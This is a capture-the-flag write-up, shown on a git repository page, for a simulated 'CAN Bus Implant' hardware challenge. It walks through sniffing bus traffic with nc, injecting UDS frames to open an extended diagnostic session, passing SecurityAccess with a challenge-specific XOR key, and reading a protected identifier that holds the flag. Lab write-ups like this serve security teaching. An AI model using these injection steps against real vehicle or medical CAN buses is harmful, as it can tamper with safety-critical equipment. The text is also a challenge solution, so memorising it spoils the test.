Eun0us/ESPILON-CTF-2026-Writeups
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
3a5f553a68
ESPILON-CTF-2026-Writeups/Hardware/CAN_Bus_Implant/solve/solve.md
Eun0us 6a0877384d [+] Writeups v2 — sync solves, real points, scoreboard stats, cleanup 
- Remove undeployed challenges: Phantom_Byte, Cr4cK_w1f1, Lain_Br34kC0r3 V1,
  Lain_VS_Knights, Lets_All_Love_UART, AETHER_NET, Last_Train_451, Web3/
- Sync 24 solve/ files from main CTF-Espilon repo
- Update all READMEs with real CTFd final scores at freeze
- Add git-header.png banner
- Rewrite README: scoreboard top 10, edition stats (1410 users, 264 boards,
  1344 solves), correct freeze date March 26 2026
2026-03-27 21:27:45 +01:00

63 lines
1.7 KiB
Markdown
Raw Blame History

# CAN Bus Implant — Solution
## Overview
Simulated CAN bus with background traffic and UDS (Unified Diagnostic Services) protocol. Player sniffs traffic to identify patterns, then injects UDS frames to gain security access and read a protected DID.
## Steps
1. Open two terminals — one for sniffing, one for injection:
```bash
# Terminal 1: Sniff
nc <host> 3600
# Terminal 2: Inject
nc <host> 3601
```
2. Observe traffic on the sniff port. Note the following patterns:
- `0x100`: Heartbeat (periodic counter)
- `0x200-0x203`: Sensor data (temperature, heart rate)
- `0x7DF`: OBD broadcast diagnostic request
- `0x7E0``0x7E8`: UDS request/response pair (periodic VIN read)
3. On the inject port, enter extended diagnostic session:
```
send 7E0 02 10 03 00 00 00 00 00
```
Response on sniff shows `0x7E8` with positive response `50 03`.
4. Request a security seed:
```
send 7E0 02 27 01 00 00 00 00 00
```
Response contains 4-byte seed: `67 01 XX XX XX XX`.
5. Compute the key by XORing each seed byte with `0x42`, then send:
```
send 7E0 06 27 02 KK KK KK KK 00
```
Positive response: `67 02`.
6. Read the flag from DID 0xFF01:
```
send 7E0 03 22 FF 01 00 00 00 00
```
Response contains the flag.
## Key Concepts
- **CAN bus**: Controller Area Network — no authentication, broadcast medium, used in vehicles and medical equipment
- **UDS (ISO 14229)**: Diagnostic protocol with services like DiagnosticSessionControl, SecurityAccess, ReadDataByIdentifier
- **SecurityAccess**: Challenge-response authentication — ECU sends seed, tester must compute correct key
- **Traffic analysis**: Identifying request/response patterns and protocol types from raw bus traffic
Reference in New Issue View Git Blame Copy Permalink